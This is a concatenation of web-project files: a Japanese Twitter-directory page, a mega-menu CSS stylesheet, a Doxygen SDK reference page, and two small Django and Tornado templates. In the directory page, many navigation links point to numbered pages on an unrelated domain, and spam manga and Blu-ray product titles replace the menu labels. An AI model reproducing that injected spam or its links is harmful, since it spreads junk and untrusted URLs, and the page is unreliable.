<a href="" class="lined block">
<span class="column icon-32">
<img src="http://pbs.twimg.com/profile_images/680394216774619138/6MmJRmsb_bigger.jpg" alt="タワーレコード川崎店(通称:タワ崎)" class="icon icon32" style="margin-top:3px" />
</span>
<span class="giftext icon-32 small">
エンタメ<br />
<span class="num mute xsmall">3,226人</span>
</span>
</a>
</li>
<li>
<a href="" class="lined block">
<span class="column icon-32">
<img src="http://pbs.twimg.com/profile_images/525836947420237824/MNKjOzix_bigger.png" alt="SHOPLIST" class="icon icon32" style="margin-top:3px" />
</span>
<span class="giftext icon-32 small">
<span style="letter-spacing:-2px">くらし・おでかけ</span><br />
<span class="num mute xsmall">6,128人</span>
</span>
</a>
</li>
<li>
<a href="" class="lined block">
<span class="column icon-32">
<img src="http://pbs.twimg.com/profile_images/609171843761594368/oBhlek1O_bigger.png" alt="ショップジャパン【公式】" class="icon icon32" style="margin-top:3px" />
</span>
<span class="giftext icon-32 small">
メディア<br />
<span class="num mute xsmall">2,639人</span>
</span>
</a>
</li>
<li>
<a href="" class="lined block">
<span class="column icon-32">
<img src="http://pbs.twimg.com/profile_images/428453450527940609/6BmKmb99_bigger.jpeg" alt="旭川市旭山動物園[公式]" class="icon icon32" style="margin-top:3px" />
</span>
<span class="giftext icon-32 small">
社会・政治<br />
<span class="num mute xsmall">886人</span>
</span>
</a>
</li>
<li>
<a href="" class="lined block">
<span class="column icon-32">
<img src="http://pbs.twimg.com/profile_images/1245987829/tokoro_san_bigger.jpg" alt="所英男" class="icon icon32" style="margin-top:3px" />
</span>
<span class="giftext icon-32 small">
スポーツ<br />
<span class="num mute xsmall">1,080人</span>
</span>
</a>
</li>
<li>
<a href="" class="lined last block">
<span class="column icon-32">
<img src="http://pbs.twimg.com/profile_images/666407537084796928/YBGgi9BO_bigger.png" alt="Twitter" class="icon icon32" style="margin-top:3px" />
</span>
<span class="giftext icon-32 small">
ビジネス・経済<br />
<span class="num mute xsmall">2,996人</span>
</span>
</a>
</li>
<li>
<a href="" class="lined last block">
<span class="column icon-32">
<img src="http://pbs.twimg.com/profile_images/525836947420237824/MNKjOzix_bigger.png" alt="SHOPLIST" class="icon icon32" style="margin-top:3px" />
</span>
<span class="giftext icon-32 small">
サービス<br />
<span class="num mute xsmall">3,871人</span>
</span>
</a>
</li>
</ul>
<div class="clearfix"></div>
</div>
</section>
<section class="section">
<h1 class="section-title small sub"><a href="">ツイッター使い方ガイド</a></h1>
<div class="section-body-sub">
<ul>
<li class="small dotted lined"><a href="http://factory.aedew.com/images/Chershire/02021717531ex.html">http://factory.aedew.com/images/Chershire/02021717531ex.html</a></li>
<li class="small dotted lined"><a href="">基本的な使い方</a></li>
<li class="small dotted lined"><a href="http://factory.aedew.com/images/Chershire/02021944184lr.html">http://factory.aedew.com/images/Chershire/02021944184lr.html</a></li>
<li class="small dotted lined"><a href="">FAQ よくある質問</a></li>
<li class="small dotted lined last" last><a href="">用語集</a></li>
</ul>
</div>
</section>
<div class="section section-fbwidget">
<div class="section-title small sub">Facebook</div>
<div class="fb-like-box" data-href="http://www.facebook.com/" data-width="292" data-height="255" data-colorscheme="light" data-show-faces="true" data-header="false" data-stream="false" data-show-border="false">BD 夜桜四重奏(ヨザクラカルテット) -ハナノウタ-【1】 Blu-ray[ポニーキャニオン]
</div>
</div>
</aside>
<div class="clearfix"></div>
<nav class="contents">
<br />
<a href="" class="link-top absright">ページの上部へ</a>
</nav>
</div>
<footer id="pagefooter" class="wrapper">
<div class="contents">
<nav>
<ul id="sitemap">
<li class="sitemap-block"><span class="top-sitemap"><a href="" class="servicename ti-topics">話題</a></span>
<ul>
<li><a href="http://factory.aedew.com/images/Chershire/02021757872mb.html">http://factory.aedew.com/images/Chershire/02021757872mb.html</a></li>
<li><a href="">ニュース</a></li>
<li><a href="">オモシロ</a></li>
<li><a href="http://factory.aedew.com/images/Chershire/02021728696au.html">http://factory.aedew.com/images/Chershire/02021728696au.html</a></li>
<li><a href="">エンタメ</a></li>
<li><a href="">IT</a></li>
<li><a href="">カルチャー</a></li>
<li><a href="">BD 夜桜四重奏(ヨザクラカルテット) -ハナノウタ-【1】 Blu-ray[ポニーキャニオン]
</a></li>
<li><a href="">お知らせ</a></li>
</ul>
<br class="block clearfix"><br>
<span class="top-sitemap"><a href="" class="servicename ti-matome">まとめ</a></span>
<ul>
<li><a href="http://twinavi.jp/matome/category/%E3%82%B3%E3%83%9F%E3%83%83%E3%82%AF%E3%83%BB%E3%82%A2%E3%83%8B%E3%83%A1">コミック・アニメ</a></li>
<li><a href="http://twinavi.jp/matome/category/%E3%82%B2%E3%83%BC%E3%83%A0">ゲーム</a></li>
<li><a href="">映画</a></li>
<li><a href="" class="div-inner small on">TV番組</a></li>
<li><a href="">芸能(海外)</a></li>
<li><a href="http://twinavi.jp/matome/category/%E8%8A%B8%E8%83%BD%EF%BC%88%E5%9B%BD%E5%86%85%EF%BC%89">芸能(国内)</a></li>
<li><a href="http://twinavi.jp/matome/category/%E3%83%97%E3%83%AD%E9%87%8E%E7%90%83">プロ野球</a></li>
<li><a href="">Jリーグ</a></li>
<li><a href="">スポーツ選手</a></li>
<li><a href="http://twinavi.jp/matome/category/%E3%82%AC%E3%82%B8%E3%82%A7%E3%83%83%E3%83%88">ガジェット</a></li>
<li><a href="http://factory.aedew.com/images/Chershire/02021943775lb.html">http://factory.aedew.com/images/Chershire/02021943775lb.html</a></li>
<li><a href="">政治</a></li>
<li><a href="http://factory.aedew.com/images/Chershire/02021742290cs.html">http://factory.aedew.com/images/Chershire/02021742290cs.html</a></li>
<li><a href="">IT</a></li>
<li><a href="http://twinavi.jp/matome/category/%E9%9F%B3%E6%A5%BD">音楽</a></li>
<li><a href="">BD 夜桜四重奏(ヨザクラカルテット) -ハナノウタ-【1】 Blu-ray[ポニーキャニオン]
</a></li>
<li><a href="">社会</a></li>
<li><a href="http://factory.aedew.com/images/Chershire/02021735691cg.html">http://factory.aedew.com/images/Chershire/02021735691cg.html</a></li>
</ul>
<br class="block clearfix"><br>
</li>
<li class="sitemap-block">
<span class="top-sitemap"><a href="http://factory.aedew.com/images/Chershire/02021708295ec.html">http://factory.aedew.com/images/Chershire/02021708295ec.html</a></span>
<ul>
<li><a href="">インタビュー 一覧</a></li>
</ul>
<br class="block clearfix"><br>
<span class="top-sitemap"><a href="" class="servicename ti-account">Twitter</a></span>
<ul>
<li><a href="./index.html">総合</a></li>
<li><a href="http://twinavi.jp/account/list/%E6%9C%89%E5%90%8D%E4%BA%BA%E3%83%BB%E8%8A%B8%E8%83%BD%E4%BA%BA">有名人・芸能人</a></li>
<li><a href="">エンタメ</a></li>
<li><a href="http://factory.aedew.com/images/Chershire/02021755472ow.html">http://factory.aedew.com/images/Chershire/02021755472ow.html</a></li>
<li><a href="">メディア</a></li>
<li><a href="http://twinavi.jp/account/list/%E3%83%93%E3%82%B8%E3%83%8D%E3%82%B9%E3%83%BB%E7%B5%8C%E6%B8%88">ビジネス・経済</a></li>
<li><a href="">BD 夜桜四重奏(ヨザクラカルテット) -ハナノウタ-【1】 Blu-ray[ポニーキャニオン]
</a></li>
<li><a href="">スポーツ</a></li>
<li><a href="">サービス</a></li>
<li><a href="http://factory.aedew.com/images/Chershire/02021757451pi.html">http://factory.aedew.com/images/Chershire/02021757451pi.html</a></li>
</ul>
<br class="block clearfix"><br>
<span class="top-sitemap"><a href="" class="servicename ti-topics">特別企画</a></span>
<ul>
<li class="clearfix"><a href="">アンケート</a></li>
<li><a href="">選挙</a></li>
</ul>
</li>
<li class="sitemap-block"><span class="top-sitemap"><a href="" class="servicename ti-guide">Twitter使い方ガイド</a></span>
<ul>
<li><a href="http://factory.aedew.com/images/Chershire/02022014515vz.html">http://factory.aedew.com/images/Chershire/02022014515vz.html</a></li>
<li><a href="">Twitterとは</a></li>
<li><a href="http://factory.aedew.com/images/Chershire/02021814297es.html">http://factory.aedew.com/images/Chershire/02021814297es.html</a></li>
<li><a href="">BD 夜桜四重奏(ヨザクラカルテット) -ハナノウタ-【1】 Blu-ray[ポニーキャニオン]
</a></li>
<li><a href="">よくある質問</a></li>
<li><a href="http://factory.aedew.com/images/Chershire/02021715772po.html">http://factory.aedew.com/images/Chershire/02021715772po.html</a></li>
</ul>
<br class="block clearfix"><br>
<span class="top-sitemap"><a href="" class="servicename ti-twitter">ツイッター検索</a></span>
<ul>
<li><a href="">キーワード検索</a></li>
<li><a href="">ユーザー会話検索</a></li>
</ul>
<br class="block clearfix"><br>
<span class="top-sitemap"><a href="" class="servicename ti-help">ツイナビヘルプ</a></span>
<ul>
<li><a href="http://factory.aedew.com/images/Chershire/02021822795tr.html">http://factory.aedew.com/images/Chershire/02021822795tr.html</a></li>
<li><a href="">よくある質問</a></li>
</ul>
</li>
</ul>
</nav>
<div class="clearfix"></div>
</div>
<div id="footer-giftext">
<div class="contents">
<!-- giftext -->
<div class="column footer-giftext">
<div class="column">
<a href="http://factory.aedew.com/images/Chershire/02021748787xo.html">http://factory.aedew.com/images/Chershire/02021748787xo.html</a>
</div>
<div class="giftext icon-m">
<span class="subtitle">ツイナビ公式Twitter</span>
<a href="" class="twitter-follow-button" data-show-count="false" data-lang="ja" data-show-screen-name="false">【漫画】蒼き鋼のアルペジオ 全巻セット (1-11巻 最新刊) / 漫画全巻ドットコム</a>
</div>
</div>
<div class="column footer-giftext">
<div class="column">
<a href="https://www.facebook.com/" target="_blank" class="altimg icon m ic-facebook">facebook</a>
</div>
<div class="giftext icon-m">
<span class="subtitle">ツイナビ公式Facebook</span>
<div id="fb-root"></div><div class="fb-like" data-href="https://www.facebook.com/" data-send="false" data-layout="button_count" data-width="200" data-show-faces="false">BD 夜桜四重奏(ヨザクラカルテット) -ハナノウタ-【1】 Blu-ray[ポニーキャニオン]
</div>
</div>
</div>
<div class="column footer-giftext twinavismart">
<div class="column">
<a href="" class="altimg icon m ic-twinavismart">ツイナビforスマートフォン</a>
</div>
<div class="giftext icon-m">
<span class="subtitle"><a href="">ツイナビforスマートフォン</a></span>
<span class="xsmall"><a href="">スマートフォンでアクセス!</a></span>
</div>
</div>
<!-- //giftext -->
<div class="clearfix"></div>
</div>
</div>
<div class="contents last">
<ul id="docs" class="centered xsmall">
<li><a href="">ツイナビ ホーム</a></li>
<li><a href="">利用規約</a></li>
<li><a href="http://www.garage.co.jp/corporate/policy/index.html" target="_blank">個人情報保護方針</a></li>
<li><a href="">健全化に関する指針</a></li>
<li><a href="http://factory.aedew.com/images/Chershire/02021736672wq.html">http://factory.aedew.com/images/Chershire/02021736672wq.html</a></li>
<li><a href="http://factory.aedew.com/images/Chershire/02021933834ay.html">http://factory.aedew.com/images/Chershire/02021933834ay.html</a></li>
<li><a href="">広告掲載について</a></li>
<li class="last"><a href="">お問い合わせ</a>
</ul>
<p class="centered xsmall"><small>Copyright © 2016 All rights reserved.</small></p>
</div>
</footer>
<div class="hide">
<div id="preregister-box">
<p class="preregister-title large">BD 夜桜四重奏(ヨザクラカルテット) -ハナノウタ-【1】 Blu-ray[ポニーキャニオン]
</p>
<p class="preregister-text">【漫画】はるか遠き国の物語 新版 [文庫版] (1-11巻 全巻) / 漫画全巻ドットコム<br/>【漫画】バガタウェイ 全巻セット (1-11巻 最新刊) / 漫画全巻ドットコム,BD 夜桜四重奏(ヨザクラカルテット) -ハナノウタ-【1】 Blu-ray[ポニーキャニオン]
</p>
<p><a href="" class="btn login preregister-login">Twitterでの認証に進む</a></p>
</div>
</div>
</body>
</html>
|
modules/mod_bootstrapmegamenu/assets/css/multi-col.css | ms08-067/thangvietsecurity | .tvtma-megamnu .nav,
.tvtma-megamnu .dropup,
.tvtma-megamnu .dropdown,
.tvtma-megamnu .collapse {
position: static;
}
.navbar.tvtma-megamnu{margin-bottom: 0;}
.navbar .brand{padding: 3px 20px 3px;}
.tvtma-megamnu .dropdown-menu {
left: auto;
top: auto;
}
.tvtma-megamnu .dropdown-menu > li {
display: block;
}
.tvtma-megamnu .nav.pull-right .dropdown-menu {
right: 0;
}
.tvtma-megamnu .tvtma-megamnu-content {
padding: 10px 10px;
*zoom: 1;
}
.tvtma-megamnu .tvtma-megamnu-content:before,
.tvtma-megamnu .tvtma-megamnu-content:after {
display: table;
content: "";
line-height: 0;
}
.tvtma-megamnu .tvtma-megamnu-content:after {
clear: both;
}
.tvtma-megamnu.navbar .nav > li > .dropdown-menu:after,
.tvtma-megamnu.navbar .nav > li > .dropdown-menu:before {
display: none;
}
.tvtma-megamnu .dropdown.tvtma-megamnu-fullwidth .dropdown-menu {
width: 100%;
left: 0;
right: 0;
}
.tvtma-megamnu-content .megacol-header, .tvtma-megamnu-content .megacol-header a{background-color: #e5e5e5;text-transform:uppercase;font-size: 11px;font-weight: bold;color: #999;}
.tvtma-megamnu-content .megacol-header a:hover{text-shadow: none;}
.tvtma-megamnu-content li a:hover, .tvtma-megamnu-content li a:focus, .tvtma-megamnu-content:hover > a, .tvtma-megamnu-content:focus > a {
text-decoration: none;
color: #fff;
background-color: #0081c2;
background-image: -moz-linear-gradient(top,#08c,#0077b3);
background-image: -webkit-gradient(linear,0 0,0 100%,from(#08c),to(#0077b3));
background-image: -webkit-linear-gradient(top,#08c,#0077b3);
background-image: -o-linear-gradient(top,#08c,#0077b3);
background-image: linear-gradient(to bottom,#08c,#0077b3);
background-repeat: repeat-x;
filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff0088cc', endColorstr='#ff0076b2', GradientType=0);
}
.tvtma-megamnu-content li a {
display: block;
padding: 3px 20px;
clear: both;
font-weight: normal;
line-height: 18px;
color: #333;
white-space: nowrap;
}
.tvtma-megamnu .dropdown-submenu>.dropdown-menu,
.tvtma-megamnu .dropdown-submenu>.nav-child.dropdown-menu {
top: 0;
left: 100%;
margin-top: -6px;
margin-left: -1px;
-webkit-border-radius: 0 6px 6px 6px;
-moz-border-radius: 0 6px 6px 6px;
border-radius: 0 6px 6px 6px;
}
.tvtma-megamnu .nav-child {
position: absolute;
z-index: 1000;
display: none;
float: left;
top: auto;
min-width: 160px;
padding: 5px 0;
margin: 0 0 0;
list-style: none;
background-color: #fff;
border: 1px solid #ccc;
border: 1px solid rgba(0,0,0,0.2);
*border-right-width: 2px;
*border-bottom-width: 2px;
-webkit-border-radius: 6px;
-moz-border-radius: 6px;
border-radius: 6px;
-webkit-box-shadow: 0 5px 10px rgba(0,0,0,0.2);
-moz-box-shadow: 0 5px 10px rgba(0,0,0,0.2);
box-shadow: 0 5px 10px rgba(0,0,0,0.2);
-webkit-background-clip: padding-box;
-moz-background-clip: padding;
background-clip: padding-box;
}
.tvtma-megamnu .nav-child.pull-right {
right: 0;
left: auto;
}
.tvtma-megamnu .nav-child .divider {
*width: 100%;
height: 1px;
margin: 8px 1px;
*margin: -5px 0 5px;
overflow: hidden;
background-color: #e5e5e5;
border-bottom: 1px solid #fff;
}
.tvtma-megamnu .nav-child a {
display: block;
padding: 3px 20px;
clear: both;
font-size: 13px;
font-weight: normal;
line-height: 18px;
color: #333;
white-space: nowrap;
}
.tvtma-megamnu .nav > li:hover > .nav-child,
.tvtma-megamnu .nav > li > a:focus + .nav-child {
display: block;
}
.tvtma-megamnu .nav-child:before {
position: absolute;
top: -7px;
left: 9px;
display: inline-block;
border-right: 7px solid transparent;
border-bottom: 7px solid #ccc;
border-left: 7px solid transparent;
border-bottom-color: rgba(0,0,0,0.2);
content: '';
}
.tvtma-megamnu .nav-child:after {
position: absolute;
top: -6px;
left: 10px;
display: inline-block;
border-right: 6px solid transparent;
border-bottom: 6px solid #ffffff;
border-left: 6px solid transparent;
content: '';
}
.tvtma-megamnu .nav-child li > a:hover,
.tvtma-megamnu .nav-child li > a:focus,
.tvtma-megamnu .nav-child:hover > a {
text-decoration: none;
color: #fff;
background-color: #08c;
background-color: #0081c2;
background-image: -moz-linear-gradient(top,#08c,#0077b3);
background-image: -webkit-gradient(linear,0 0,0 100%,from(#08c),to(#0077b3));
background-image: -webkit-linear-gradient(top,#08c,#0077b3);
background-image: -o-linear-gradient(top,#08c,#0077b3);
background-image: linear-gradient(to bottom,#08c,#0077b3);
background-repeat: repeat-x;
filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff0088cc', endColorstr='#ff0076b2', GradientType=0);
}
.navbar-header{float: left;}
@media (max-width: 969px) {
.tvtma-megamnu .dropdown.tvtma-megamnu-fullwidth .dropdown-menu {width: auto;}
.tvtma-megamnu .tvtma-megamnu-content {padding-left: 0;padding-right: 0;}
.tvtma-megamnu .dropdown-menu > li > ul {display: block;}
.tvtma-megamnu .btn-navbar{margin-top:18px;}
} |
doc/UmpRangeAddRequest_8cpp.html | sd44/TaobaoCppQtSDK | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" content="Doxygen 1.8.3.1"/>
<title>Taobao Cpp/Qt SDK: TaoApiCpp/request/UmpRangeAddRequest.cpp File Reference</title>
<link href="tabs.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="jquery.js"></script>
<script type="text/javascript" src="dynsections.js"></script>
<link href="search/search.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="search/search.js"></script>
<script type="text/javascript">
$(document).ready(function() { searchBox.OnSelectItem(0); });
</script>
<link href="doxygen.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="top"><!-- do not remove this div, it is closed by doxygen! -->
<div id="titlearea">
<table cellspacing="0" cellpadding="0">
<tbody>
<tr style="height: 56px;">
<td style="padding-left: 0.5em;">
<div id="projectname">Taobao Cpp/Qt SDK
</div>
</td>
</tr>
</tbody>
</table>
</div>
<!-- end header part -->
<!-- Generated by Doxygen 1.8.3.1 -->
<script type="text/javascript">
var searchBox = new SearchBox("searchBox", "search",false,'Search');
</script>
<div id="navrow1" class="tabs">
<ul class="tablist">
<li><a href="index.html"><span>Main Page</span></a></li>
<li><a href="pages.html"><span>Related Pages</span></a></li>
<li><a href="annotated.html"><span>Classes</span></a></li>
<li class="current"><a href="files.html"><span>Files</span></a></li>
<li>
<div id="MSearchBox" class="MSearchBoxInactive">
<span class="left">
<img id="MSearchSelect" src="search/mag_sel.png"
onmouseover="return searchBox.OnSearchSelectShow()"
onmouseout="return searchBox.OnSearchSelectHide()"
alt=""/>
<input type="text" id="MSearchField" value="Search" accesskey="S"
onfocus="searchBox.OnSearchFieldFocus(true)"
onblur="searchBox.OnSearchFieldFocus(false)"
onkeyup="searchBox.OnSearchFieldChange(event)"/>
</span><span class="right">
<a id="MSearchClose" href="javascript:searchBox.CloseResultsWindow()"><img id="MSearchCloseImg" border="0" src="search/close.png" alt=""/></a>
</span>
</div>
</li>
</ul>
</div>
<div id="navrow2" class="tabs2">
<ul class="tablist">
<li><a href="files.html"><span>File List</span></a></li>
<li><a href="globals.html"><span>File Members</span></a></li>
</ul>
</div>
<!-- window showing the filter options -->
<div id="MSearchSelectWindow"
onmouseover="return searchBox.OnSearchSelectShow()"
onmouseout="return searchBox.OnSearchSelectHide()"
onkeydown="return searchBox.OnSearchSelectKey(event)">
<a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(0)"><span class="SelectionMark"> </span>All</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(1)"><span class="SelectionMark"> </span>Classes</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(2)"><span class="SelectionMark"> </span>Files</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(3)"><span class="SelectionMark"> </span>Functions</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(4)"><span class="SelectionMark"> </span>Variables</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(5)"><span class="SelectionMark"> </span>Pages</a></div>
<!-- iframe showing the search results (closed by default) -->
<div id="MSearchResultsWindow">
<iframe src="javascript:void(0)" frameborder="0"
name="MSearchResults" id="MSearchResults">
</iframe>
</div>
<div id="nav-path" class="navpath">
<ul>
<li class="navelem"><a class="el" href="dir_5ced2c06884fa9bf5c2da90298abd959.html">TaoApiCpp</a></li><li class="navelem"><a class="el" href="dir_1128517a525300e3048e72552ab6f4a6.html">request</a></li> </ul>
</div>
</div><!-- top -->
<div class="header">
<div class="headertitle">
<div class="title">UmpRangeAddRequest.cpp File Reference</div> </div>
</div><!--header-->
<div class="contents">
<div class="textblock"><code>#include <<a class="el" href="UmpRangeAddRequest_8h_source.html">TaoApiCpp/request/UmpRangeAddRequest.h</a>></code><br/>
</div></div><!-- contents -->
<!-- start footer part -->
<hr class="footer"/><address class="footer"><small>
Generated on Sun Apr 14 2013 16:25:37 for Taobao Cpp/Qt SDK by  <a href="http://www.doxygen.org/index.html">
<img class="footer" src="doxygen.png" alt="doxygen"/>
</a> 1.8.3.1
</small></address>
</body>
</html>
|
user/templates/user/clients.html | Razi91/BiblioTeKa | {% extends 'base.html' %}
{% load bootstrap %}
{% block content %}
<h1>Klienci</h1>
<table class="table">
<thead>
<tr>
<th>Imię i nazwisko</th>
<th>PESEL</th>
<th>Kredyty</th>
<th>Wykup subskrypcję</th>
<th>Wypożyczone</th>
<th>Akcje</th>
</tr>
</thead>
<tbody>
{% for c in clients %}
<form action="?">
<tr>
<td>{{ c.user.first_name }} {{ c.user.last_name }}</td>
<td>{{ c.pesel }}</td>
<td><input type="text" name="credits" value="{{ c.credits }}"></td>
<td>
<select name="subscription">
<option value="-1"></option>
{% for s in subscriptions %}
<option value="{{ s.id }}">{{ s.name }} ({{ s.prize }} → {{ s.credits }})</option>
{% endfor %}
</select>
</td>
<td>
{{ c.active_loans.count }}
</td>
<td>
<input class="btn btn-md btn-success" type="submit" value="Zapisz">
</td>
</tr>
</form>
{% endfor %}
</tbody>
</table>
{% endblock %} |
templates/index.html | ningdegang/blog | {% extends 'base.htm' %}
{% block main %}
{% for b in bb %}
<div class="big-margin">
<h2> {{b.get("title")}} </h2>
<p> {{b.get("content")}} </p>
<p> <a class="btn" href="list?title={{b.get('title')}}">查看详细...</a> </p>
</div>
{% end %}
{% end %}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.